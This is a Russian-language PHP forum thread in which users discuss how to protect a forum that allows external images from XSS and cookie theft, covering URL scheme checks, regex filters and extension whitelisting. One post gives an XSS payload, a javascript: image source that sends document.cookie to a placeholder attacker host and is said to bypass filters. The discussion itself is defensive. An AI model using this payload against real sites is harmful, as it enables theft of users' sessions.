Форум PHP

Я говорю о теге <IMG SRC=http://...> референс которого будет запрошен браузером безо всяких действий пользователя.

Можно выводить под также через htmlspecialchars() ссылку на страницу, чтобы пользователи видили куда идут... но это тоже не всегда применимо.

Для этого надо их в гет запрос подставить. А это можно сделать только с помощью клиентсокго кода.

Допустим, проверили мы URL, и содержимое проверили. И сочли ссылку валидной.
Только ведь никакой гарантии, что этот файл статический, а не сформирован сервером через mod_rewrite, который из GET-запроса успеет кукисы к себе стянуть.... когда эта ссылка будет выложена в html-тексте на одной из страниц сервера в теге <img src=...>

Допустим, проверили мы URL, и содержимое проверили. И сочли ссылку валидной.
Только ведь никакой гарантии, что этот файл статический, а не сформирован сервером через mod_rewrite, который из GET-запроса успел кукисы к себе стянуть....

url может быть относительным. :(
Т.е. схема доступа http/ftp/javascript... должна проверяться лишь тогда, когда она в принципе указана. ^(?=[\w]+\:)

Можно опережающей проверкой ещё пройтись... грубо говоря должён URL начинаться с http, так будте добры писать http, т.е. что-то вроде

^(?=http:)

src="javascript:open('http://hacksite.com/test.php?cookie=' + document.cookie); //.jpg"

Вроде такая штука проползет через фильтры:)

Так пароли никому и не нужны... нужны статусы:)

Хм... можно проверять формат URL и допускать только файлы с расширениями gif jpeg. В cookie в любом случае не нужно хранить ничего ценного вроде паролей к аккаунтам, где деньги лежат :)))

А у меня такой вопрос: если в форуме есть возможность вставлять картинки с других серверов, можно ли как-то защититься от xss атаки?
И вторая половина вопроса: если уж нельзя защититься, то что надо хранить в куках, чтобы злоумышленнику эти данные не помогли?